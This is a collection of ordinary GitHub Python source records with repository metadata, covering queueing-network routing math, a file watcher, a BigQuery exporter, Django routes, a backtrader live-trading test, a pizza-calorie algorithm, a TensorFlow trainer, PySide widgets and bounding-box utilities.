\"\"\"\n layer_num = len(rates)\n lambda_hat = [np.zeros((1, len(rates[i]))) for i in range(layer_num)]\n lambda_hat[0] = rates[0]\n for i in range(1, layer_num):\n lambda_hat[i] = np.matmul(lambda_hat[i - 1], routing_p[i - 1])\n test = rates[i] - lambda_hat[i]\n if test[test <= 0]:\n print(\"Initial A is wrong!\")\n return 1\n res_sum = 0\n for i in range(layer_num - 1):\n res_sum += analytic_avg_delay_two_layers(lambda_hat[i], rates[i + 1] / vol_dec[:i+1].prod(), delta[i], routing_p[i])\n return res_sum\n\n\ndef no_delay_optimal(arrival_rates, service_rates):\n '''\n \tFind the optimal completion time using Lagrange multiplier for a network without propagation delays\n \tconsidering only two layers\n '''\n n = len(service_rates)\n num = 0\n for j in range(n):\n num += sqrt(service_rates[j])\n denom = sum(service_rates) - sum(arrival_rates)\n K = pow(num / denom, 2)\n lambda_hat = np.zeros((n, 1))\n for j in range(n):\n lambda_hat[j] = service_rates[j] - sqrt(service_rates[j]/K)\n service_time = 0\n for j in range(n):\n service_time += lambda_hat[j] / (service_rates[j] - lambda_hat[j])\n service_time = service_time / sum(arrival_rates)\n result = {'lambda_hat': lambda_hat, 'Mean_completion_time': service_time}\n return result\n\n\ndef cur_vol(cur_layer_index, layer_dic, vol_dec):\n data_type_num = len(layer_dic.keys())\n res = np.ones(data_type_num)\n for i in range(data_type_num):\n for j in range(cur_layer_index + 1):\n res[i] *= vol_dec[i, j]\n return res\n\n\ndef effective_rates(arrival_rates, service_rates, cur_layer_index, layer_dic, data_dist, vol_dec):\n data_type_num = len(data_dist)\n effective_dist = np.zeros(data_type_num)\n data_vol = cur_vol(cur_layer_index, layer_dic, vol_dec)\n for i in range(data_type_num):\n if layer_dic[i].count(cur_layer_index + 
1) > 0:\n effective_dist[i] = data_dist[i]\n eff_arrival_rates = arrival_rates * sum(effective_dist)\n eff_service_rates = service_rates / (np.dot(data_vol, effective_dist) / sum(effective_dist))\n return [eff_arrival_rates, eff_service_rates]\n\n\ndef grad_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = grad_projected(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef barrier_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = barrier_method(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef valid_initial_rates(source_rates, server_rates, para):\n \"\"\"\n :param source_rates: source rates (array)\n :param server_rates: server rates (array)\n :param para: parameter for finding initial rates\n :return: valid initial routing probabilities that guarantees queue stability\n \"\"\"\n eps = 0.001\n sources_num = len(source_rates)\n servers_num = len(server_rates)\n initial_a = eps * np.ones((sources_num, servers_num))\n for i in range(servers_num):\n temp = np.ones(sources_num) * para * server_rates[i] / np.sum(source_rates)\n initial_a[:, i] = np.minimum(temp, 1 - np.sum(initial_a, 1) + initial_a[:, i])\n source_rates = np.matmul(source_rates.reshape((1, sources_num)), initial_a).flatten()\n # print(server_rates - source_rates) # to check validity\n return initial_a\n\n\ndef legacy_optimal_routing(locations):\n \"\"\"\n :param locations: coordinates info for spatial distribution of nodes in the network\n :return: a, (list that consists of arrays) the optimal routing probability in the legacy network\n \"\"\"\n layer_num = len(locations)\n a = [np.zeros((len(locations[i]), len(locations[i + 1]))) for i in range(layer_num - 1)]\n for i in range(layer_num - 1):\n for j in range(len(locations[i])):\n delay_info = [delay(locations[i][j], locations[i + 1][k]) for k in range(len(locations[i + 1]))]\n min_delay_index = np.argmin(delay_info)\n a[i][j][min_delay_index] = 1\n return a\n\n\ndef bandwidth_efficiency(vol_dec, 
data_type_dist, layer_dic, source_rates):\n \"\"\"\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :param source_rates: (array), source rates in the network\n :return: res, bandwidth efficiency which is proportion to the product of rate and data volume\n \"\"\"\n layer_num = np.size(vol_dec, axis=1)\n res = 0\n data_type_num = len(data_type_dist)\n departure_process_rate = sum(source_rates)\n for l in range(layer_num - 1):\n temp_dist = np.zeros(data_type_num)\n for i in range(data_type_num):\n temp_max_layer = max(layer_dic[i])\n if temp_max_layer > l:\n temp_dist[i] = data_type_dist[i]\n cur_vol_temp = cur_vol(l, layer_dic, vol_dec)\n avg_data_vol = np.dot(cur_vol_temp, temp_dist)\n res += avg_data_vol\n return departure_process_rate * res\n\n\ndef bandwidth_efficiency_compare(data_type_dist, source_rates, layer_dic, vol_dec):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param source_rates: (array), source rates in the network\n :param layer_dic: (dictionary), required layer info for each data type\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :return: res, ratio of bandwidth usages between in-network processing and legacy networks\n \"\"\"\n data_type_num = len(data_type_dist)\n layer_num = np.size(vol_dec, axis=1)\n legacy_vol_dec = np.ones((data_type_num, layer_num))\n legacy_data_type_dist = np.array([1])\n legacy_layer_dic = {0: [0, layer_num - 1]}\n b_e_legacy = bandwidth_efficiency(legacy_vol_dec, legacy_data_type_dist, legacy_layer_dic, source_rates)\n b_e_in_network_processing = bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates)\n res = b_e_in_network_processing / b_e_legacy\n return res\n\n\ndef avg_last_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, average last layer\n \"\"\"\n temp = list(layer_dic.values())\n temp_max = np.array([max(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_max)\n return res\n\n\ndef avg_sum_required_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, expected sum of the required layers\n \"\"\"\n temp = list(layer_dic.values())\n temp_sum = np.array([sum(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_sum)\n return res\n\n","repo_name":"Youngrock-Oh/Data_centric_network","sub_path":"Analytic_res.py","file_name":"Analytic_res.py","file_ext":"py","file_size_in_byte":10392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"74742277929","text":"import time\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nclass TestHandler(FileSystemEventHandler):\n def on_any_event(self, event):\n print(f\"Event detected: {event}\")\n\nobserver = Observer()\nevent_handler = TestHandler()\nobserver.schedule(event_handler, path='C:\\\\Users\\\\oropesa\\\\Documents\\\\Magicus', recursive=True)\nobserver.start()\n\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()\n#this is just a commentdsfgdggggbg","repo_name":"thepwnman33/Magicus","sub_path":"test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70275139690","text":"import pandas_gbq\n\n\nclass BigQueryExporter:\n def __init__(self, credentials, project_id, table_name):\n self.credentials = credentials\n self.project_id = project_id\n self.table_name = table_name\n\n def export(self, df):\n pandas_gbq.to_gbq(\n dataframe=df,\n destination_table=self.table_name,\n project_id=self.project_id,\n if_exists='append')\n","repo_name":"crazydev71/ga-export","sub_path":"jobs/exporters/big_query_exporter.py","file_name":"big_query_exporter.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"26678415217","text":"from django.urls import path, include\nfrom . import views\nfrom .views import *\nfrom rest_framework import routers\n\nrouter = routers.SimpleRouter()\nrouter.register(r'books_api', views.BookViewSet)\nrouter.register(r\"author_books\", views.Author_BookViewSet)\nrouter.register(r\"author_book_detail\", views.Author_Book_DetailViewSet)\nrouter.register(r\"book_detail\", views.Book_DetailViewSet)\nrouter.register(r\"collection_API\", views.Collection_API_ReturnViewSet)\nrouter.register(r\"subject_book_API\", views.Subject_API_ReturnViewSet)\nrouter.register(r\"audiobook_api\", views.AudioBookViewSet, basename=\"audiobooks\")\n#router.register(r\"multiplebooks\", views.ReadingListSearchView, basename=\"readinglist\")\n\n#router.register(r\"booksearch\", views.BookSearch)\n\nurlpatterns = [\n path('', views.books),\n path('', include(router.urls)),\n path('booksearch/', views.BookSearch.as_view(), name=\"BookSearch\"),\n path('authorsearch/', views.AuthorSearch.as_view(), name=\"AuthorSearch\"),\n path('subjectsearch/', views.SubjectSearch.as_view(), name=\"SubjectSearch\"),\n path('collectionsearch/', views.CollectionSearch.as_view(), name=\"CollectionSearch\"),\n path('bookbyid/', views.BookById.as_view(), name=\"BookByID\"),\n path('collections/', views.Collections.as_view(), name=\"Collections\"),\n path(\"author_book//\", Author_BookAPIView.as_view(), name=\"AuthorBookLookup\"),\n path(\"collection_book//\", Collection_BookAPIView.as_view(), name=\"CollectionBookLookup\"),\n path(\"bookmetadata//\", BookMetaDataView.as_view(), name=\"MetaData\"),\n path(\"bookmetadatalookup//\", BookMetaDataLookupAPIView.as_view(), name=\"MetaDataLookup\"),\n path(\"audiobooks//\", AudioBookView.as_view(), name=\"AudioBookLookup\"),\n\n #path(\"collection_api/\", Collection_API_ReturnViewSet.as_view(), name=\"CollectionAPI\"),\n #path(\"testing/\", views.testAPI.as_view(), name=\"Testing\"),\n #path(\"author_book_detail\", Author_Book_DetailViewSet.as_view(), name=\"AuthorBookDetail\"),\n]\n","repo_name":"rdmullins/rm-ereader-backend","sub_path":"e_reader/ereader/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1784910433","text":"import sys\nimport os\nimport sys\nsys.path.append('.')\nfrom ccxtbt import CCXTStore\nimport backtrader as bt\nfrom utils.helper import init_env, get_env\nimport logging.config\nimport time\nfrom tools.telegram import Telegram\nfrom datetime import datetime, timedelta\n\n\nclass OneBuy(bt.Strategy):\n\n def __init__(self):\n self.m = 0\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.datetime(0)\n print(f'{dt} {txt}') # Print date and close\n\n def notify_data(self, data, status, *args, **kwargs):\n dn = data._name\n msg = f'{dn} Data Status: {data._getstatusname(status)}'\n self.log(msg, datetime.utcnow())\n if data._getstatusname(status) == 'LIVE':\n self.live_data = True\n else:\n self.live_data = False\n\n def notify_order(self, order):\n self.log(\n f\"Order: {order.ordtypename()}, Status: {order.getstatusname()}, Price: {order.executed.price}, Size: {order.executed.size}, Alive: {order.alive()}\"\n )\n\n def next(self):\n if not self.live_data: return\n if self.m == 0:\n data = self.datas[0]\n self.buy(data)\n self.m = 1\n self.log(\"buy\")\n\n\nif __name__ == '__main__':\n\n init_env()\n logging.config.fileConfig(\"logging.ini\")\n logging.Formatter.converter = time.gmtime #utc\n cerebro = bt.Cerebro(quicknotify=True)\n\n # Add the strategy\n cerebro.addstrategy(OneBuy)\n cerebro.addanalyzer(Telegram)\n\n # Create our store\n config = { 'apiKey': get_env('B_APIKEY'), 'secret': get_env('B_SECRET'), 'enableRateLimit': True }\n if get_env(\"PROXY\") == '1':\n config['requests_trust_env'] = True\n\n # IMPORTANT NOTE - Kraken (and some other exchanges) will not return any values\n # for get cash or value if You have never held any BNB coins in your account.\n # So switch BNB to a coin you have funded previously if you get errors\n store = CCXTStore(exchange='binanceusdm', currency='USDT', config=config, retries=10, debug=False)\n\n # Get the broker and pass any kwargs if needed.\n # ----------------------------------------------\n # Broker mappings have been added since some exchanges expect different values\n # to the defaults. Case in point, Kraken vs Bitmex. NOTE: Broker mappings are not\n # required if the broker uses the same values as the defaults in CCXTBroker.\n broker_mapping = {\n 'order_types': {\n bt.Order.Market: 'market',\n bt.Order.Limit: 'limit',\n bt.Order.Stop: 'stop-loss', #stop-loss for kraken, stop for bitmex\n bt.Order.StopLimit: 'stop limit'\n },\n 'mappings': {\n 'closed_order': {\n 'key': 'status',\n 'value': 'closed'\n },\n 'canceled_order': {\n 'key': 'status',\n 'value': 'canceled'\n }\n }\n }\n\n broker = store.getbroker(broker_mapping=broker_mapping)\n cerebro.setbroker(broker)\n\n # Get our data\n # Drop newest will prevent us from loading partial data from incomplete candles\n hist_start_date = datetime.utcnow() - timedelta(minutes=(220 + 6) * 5)\n data = store.getdata(\n dataname='ETC/USDT',\n name=\"ETCUSDT\",\n timeframe=bt.TimeFrame.Minutes,\n fromdate=hist_start_date,\n compression=5,\n ohlcv_limit=99999,\n drop_newest=True,\n # historical=True\n )\n\n # Add the feed\n cerebro.adddata(data)\n\n cerebro.broker.setcommission(commission=0.0004, margin=0.1, mult=1.0)\n cerebro.addsizer(bt.sizers.FixedSize, stake=1)\n\n # Run the strategy\n cerebro.run()","repo_name":"xiangxn/backtrader-example","sub_path":"tests/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"16364557095","text":"import sys \ninput = sys.stdin.readline\nn = int(input()) # 토핑 종류의 수 n\na, b = map(int, input().split()) # 도우의 가격 a , 토핑의 가격 b\nc = int(input()) # 도우의 열량 c\ntopping = [] # 토핑의 열량 리스트\nfor _ in range(n):\n topping.append(int(input()))\ntopping.sort(reverse=True) # 내림차순 정렬\n\nresult = c / a # 토핑을 0개 선택했을 경우\nfor i in range(1, len(topping)+1): # 토핑을 1개 이상 선택했을 경우\n calory = c + sum(topping[0:i]) # 피자의 열량\n price = a + (b*i) # 피자의 가격\n if calory / price > result: # max인지 판단\n result = calory / price\n else:\n break\n \nprint(int(result))","repo_name":"letmeloveyou82/Algorithm","sub_path":"Python/BOJ/그리디/5545.py","file_name":"5545.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10592226082","text":"from core.base_train import BaseTrain\nfrom tqdm import tqdm\nfrom misc.utils import SetFromFlat, GetFlat, unflatten, flatten, numel\nimport numpy as np\nimport tensorflow as tf\n\n\nclass Trainer(BaseTrain):\n def __init__(self, sess, model, train_loader, test_loader, config, logger):\n super(Trainer, self).__init__(sess, model, config, logger)\n self.train_loader = train_loader\n self.test_loader = test_loader\n\n self.get_params = GetFlat(self.sess, self.model.params_net)\n self.set_params = SetFromFlat(self.sess, self.model.params_net)\n self.unflatten = unflatten(self.model.params_net)\n self.norm_list = []\n\n self.summary_op = tf.summary.merge_all()\n\n def init_kfac(self):\n self.logger.info('Roger Initialization!')\n self.model.optim._fisher_est.reset(self.sess)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n # self.model.targets: y,\n self.model.is_training: True\n }\n self.sess.run(self.model.optim.init_cov_op, feed_dict=feed_dict)\n self.model.optim._fisher_est.rescale(self.sess, 1. / len(self.train_loader))\n\n # inverse\n if self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n self.logger.info('Done Roger Initialization!')\n\n def train(self):\n if self.config.roger_init:\n self.init_kfac()\n for cur_epoch in range(self.config.epoch):\n self.logger.info('epoch: {}'.format(int(cur_epoch)))\n self.train_epoch()\n self.test_epoch()\n\n if cur_epoch % 100 == 0:\n self.model.save(self.sess)\n\n def train_epoch(self):\n loss_list = []\n acc_list = []\n\n for itr, (x, y) in enumerate(tqdm(self.train_loader)):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True,\n }\n self.sess.run(self.model.train_op, feed_dict=feed_dict)\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n\n if cur_iter % self.config.get('TCov', 10) == 0 and self.model.cov_update_op is not None:\n self.sess.run(self.model.cov_update_op, feed_dict=feed_dict)\n\n if cur_iter % self.config.get('TInv', 100) == 0 and self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True\n }\n\n loss, acc = self.sess.run(\n [self.model.loss, self.model.acc],\n feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Train] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n l2_norm = self.sess.run(self.model.l2_norm)\n self.logger.info(\"l2_norm: %5.4f\"%(float(l2_norm)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['train_loss'] = avg_loss\n summaries_dict['train_acc'] = avg_acc\n summaries_dict['l2_norm'] = l2_norm\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n def test_epoch(self):\n loss_list = []\n acc_list = []\n for (x, y) in self.test_loader:\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: False\n }\n loss, acc = self.sess.run([self.model.loss, self.model.acc], feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Test] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n # summarize\n summaries_dict = dict()\n 
summaries_dict['test_loss'] = avg_loss\n summaries_dict['test_acc'] = avg_acc\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n\n","repo_name":"gd-zhang/Weight-Decay","sub_path":"core/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
+{"seq_id":"70700699047","text":"from PySide import QtCore, QtGui\nfrom functools import partial\n\ndef add_spinbox(label, parent_layout, min=None, max=None, default=None, double_spinbox=False):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n label = QtGui.QLabel(label)\n label.setMinimumWidth(100)\n horiz_layout.addWidget(label)\n\n horiz_layout.addStretch()\n\n spinbox = QtGui.QSpinBox() if not double_spinbox else QtGui.QDoubleSpinBox()\n\n if min:\n spinbox.setMinimum(min)\n if max:\n spinbox.setMaximum(max)\n if default:\n spinbox.setValue(default)\n\n\n horiz_layout.addWidget(spinbox)\n spinbox.setMinimumWidth(100)\n\n return spinbox\n\n\ndef add_populate_lineedit(label, parent_layout, callback=None, kwargs={}):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n button = QtGui.QPushButton(label)\n button.setMinimumWidth(80)\n horiz_layout.addWidget(button)\n\n lineedit = QtGui.QLineEdit()\n horiz_layout.addWidget(lineedit)\n lineedit.setMinimumWidth(100)\n\n \n if callback is not None:\n \n kwargs['lineedit'] = lineedit\n button.clicked.connect(partial(callback, **kwargs))\n\n return lineedit","repo_name":"EriLee/petfactory_maya_scripts","sub_path":"petfactory/gui/simple_widget.py","file_name":"simple_widget.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"72271213287","text":"from typing import Optional, Tuple, Union\n\nimport numpy as np\nimport torch\n\nfrom cap.core.point_geometry import coor_transformation\n\n__all__ = [\n \"box_center_to_corner\",\n \"box_corner_to_center\",\n \"bbox_overlaps\",\n \"get_bev_bbox\",\n \"zoom_boxes\",\n]\n\n\ndef box_center_to_corner(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from center format (xcenter, ycenter,\n width, height) to corner format (x_low, y_low, x_high, y_high)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n cx, cy, w, h = torch.split(bboxes, 1, dim=-1)\n x1 = cx - (w - border) * 0.5\n y1 = cy - (h - border) * 0.5\n x2 = x1 + w - border\n y2 = y1 + h - border\n\n if split:\n return x1, y1, x2, y2\n else:\n return torch.cat([x1, y1, x2, y2], dim=-1)\n\n\ndef box_corner_to_center(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from corner format (x_low, y_low, x_high, y_high)\n to center format (xcenter, ycenter, width, height)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n x1, y1, x2, y2 = torch.split(bboxes, 1, dim=-1)\n width = x2 - x1 + border\n height = y2 - y1 + border\n cx = x1 + (width - border) * 0.5\n cy = y1 + (height - border) * 0.5\n\n if split:\n return cx, cy, width, height\n else:\n return torch.cat([cx, cy, width, height], dim=-1)\n\n\ndef bbox_overlaps(\n bboxes1: Union[torch.tensor, np.ndarray],\n bboxes2: Union[torch.tensor, np.ndarray],\n mode: Optional[str] = \"iou\",\n is_aligned: Optional[bool] = False,\n eps: Optional[float] = 1e-6,\n):\n \"\"\"\n Calculate overlap between two set of bboxes.\n\n Args:\n bboxes1 (Tensor or np.ndarray):\n shape (m, 4) in format or empty.\n bboxes2 (Tensor or np.ndarray):\n shape (n, 4) in format or empty.\n mode (str): \"iou\" (intersection over union), \"iof\" (intersection over\n foreground) or \"giou\" (generalized intersection over union).\n Default \"iou\".\n is_aligned (bool, optional): If True, then m and n must be equal.\n Default False.\n eps (float, optional): A value added to the denominator for numerical\n stability. 
Default 1e-6.\n\n Returns:\n Tensor: shape (m, n) if ``is_aligned `` is False else shape (m,)\n \"\"\"\n\n assert isinstance(bboxes1, type(bboxes2))\n is_ndarray = False\n if isinstance(bboxes1, np.ndarray):\n is_ndarray = True\n bboxes1 = torch.from_numpy(bboxes1)\n bboxes2 = torch.from_numpy(bboxes2)\n\n assert mode in [\"iou\", \"iof\", \"giou\"], f\"Unsupported mode {mode}\"\n # Either the boxes are empty or the length of boxes' last dimension is 4\n assert bboxes1.size(-1) == 4 or bboxes1.size(0) == 0\n assert bboxes2.size(-1) == 4 or bboxes2.size(0) == 0\n\n rows = bboxes1.size(0)\n cols = bboxes2.size(0)\n\n if is_aligned:\n assert rows == cols\n\n if rows * cols == 0:\n if is_aligned:\n return bboxes1.new_zeros((rows,))\n else:\n return bboxes1.new_zeros((rows, cols))\n\n area1 = (bboxes1[..., 2] - bboxes1[..., 0]) * (\n bboxes1[..., 3] - bboxes1[..., 1]\n )\n area2 = (bboxes2[..., 2] - bboxes2[..., 0]) * (\n bboxes2[..., 3] - bboxes2[..., 1]\n )\n\n if is_aligned:\n lt = torch.max(bboxes1[..., :2], bboxes2[..., :2]) # [rows, 2]\n rb = torch.min(bboxes1[..., 2:], bboxes2[..., 2:]) # [rows, 2]\n\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n\n if mode in [\"iou\", \"giou\"]:\n union = area1 + area2 - overlap\n else:\n union = area1\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[..., :2], bboxes2[..., :2])\n enclosed_rb = torch.max(bboxes1[..., 2:], bboxes2[..., 2:])\n else:\n lt = torch.max(\n bboxes1[:, None, :2], bboxes2[None, :, :2]\n ) # [rows, cols, 2]\n rb = torch.min(\n bboxes1[:, None, 2:], bboxes2[None, :, 2:]\n ) # [rows, cols, 2]\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n if mode in [\"iou\", \"giou\"]:\n union = area1[..., None] + area2[..., None, :] - overlap\n else:\n union = area1[..., None]\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[:, None, :2], bboxes2[None, :, :2])\n enclosed_rb = torch.max(bboxes1[:, None, 2:], bboxes2[None, :, 2:])\n\n eps = union.new_tensor([eps])\n union = torch.max(union, eps)\n ious = overlap / union\n if mode in [\"iou\", \"iof\"]:\n return ious if not is_ndarray else ious.numpy()\n # calculate gious\n enclose_wh = (enclosed_rb - enclosed_lt).clamp(min=0)\n enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]\n enclose_area = torch.max(enclose_area, eps)\n gious = ious - (enclose_area - union) / enclose_area\n return gious if not is_ndarray else gious.numpy()\n\n\n# =============================================================================\n# The following methods are mostly used in lidar 3d box processing.\n# =============================================================================\n\n\ndef corners_nd(\n dims: np.ndarray, origin: Union[Tuple[float, ...], float] = 0.5\n):\n \"\"\"Generate relative box corners based on length per dim and origin point.\n\n Args:\n dims (np.ndarray): [N, ndim] tensor. Box size in each dimension.\n origin ([Union[Tuple[float, ...], float]):\n origin point relative to the smallest point. 
Defaults to 0.5.\n\n Returns:\n corners (np.ndarray): [N, 2**ndim, ndim] sized tensor of corners.\n point layout example: (2d) x0y0, x0y1, x1y0, x1y1;\n (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n where x0 < x1, y0 < y1, z0 < z1\n \"\"\"\n ndim = int(dims.shape[1])\n corners_norm = np.stack(\n np.unravel_index(np.arange(2 ** ndim), [2] * ndim), axis=1\n ).astype(dims.dtype)\n # now corners_norm has format: (2d) x0y0, x0y1, x1y0, x1y1\n # (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n # so need to convert to a format which is convenient to do other computing.\n # for 2d boxes, format is clockwise start with minimum point\n # for 3d boxes, please draw lines by your hand.\n if ndim == 2:\n # generate clockwise box corners\n corners_norm = corners_norm[[0, 1, 3, 2]]\n elif ndim == 3:\n corners_norm = corners_norm[[0, 1, 3, 2, 4, 5, 7, 6]]\n corners_norm = corners_norm - np.array(origin, dtype=dims.dtype)\n corners = dims.reshape([-1, 1, ndim]) * corners_norm.reshape(\n [1, 2 ** ndim, ndim]\n )\n return corners\n\n\ndef rotation_2d(points: np.ndarray, angles: float):\n \"\"\"Rotate 2d points based on origin point clockwise when angle positive.\n\n Args:\n points (float array, shape=[N, point_size, 2]): points to be rotated.\n angles (float array, shape=[N]): rotation angle.\n\n Returns:\n float array: same shape as points\n \"\"\"\n rot_sin = np.sin(angles)\n rot_cos = np.cos(angles)\n rot_mat_T = np.stack([[rot_cos, -rot_sin], [rot_sin, rot_cos]])\n return np.einsum(\"aij,jka->aik\", points, rot_mat_T)\n\n\ndef center_to_corner_box2d(\n centers: np.ndarray,\n dims: np.ndarray,\n angles: Optional[np.ndarray] = None,\n origin: float = 0.5,\n):\n \"\"\"Convert Kitti-style locations, dimensions and angles to corners.\n\n format: center(xy), dims(xy), angles(clockwise when positive)\n\n Args:\n centers (float array, shape=[N, 2]): locations in kitti label file.\n dims (float array, shape=[N, 2]): dimensions in kitti label file.\n angles (float array, shape=[N]): rotation_y in kitti label file.\n\n Returns:\n np.ndarray: corner representation of boxes.\n \"\"\"\n # 'length' in kitti format is in x axis.\n # xyz(hwl)(kitti label file)<->xyz(lhw)(camera)<->z(-x)(-y)(wlh)(lidar)\n # center in kitti format is [0.5, 1.0, 0.5] in xyz.\n corners = corners_nd(dims, origin=origin)\n # corners: [N, 4, 2]\n if angles is not None:\n corners = rotation_2d(corners, angles)\n corners += centers.reshape([-1, 1, 2])\n return corners\n\n\ndef zoom_boxes(boxes: torch.Tensor, roi_wh_zoom_scale: Tuple[float, float]):\n \"\"\"Zoom boxes.\n\n Args:\n boxes: shape (m, 4) in format.\n roi_wh_zoom_scale: (w_scale, h_scale).\n\n Returns:\n torch.Tensor: zoomed bboxes.\n \"\"\"\n 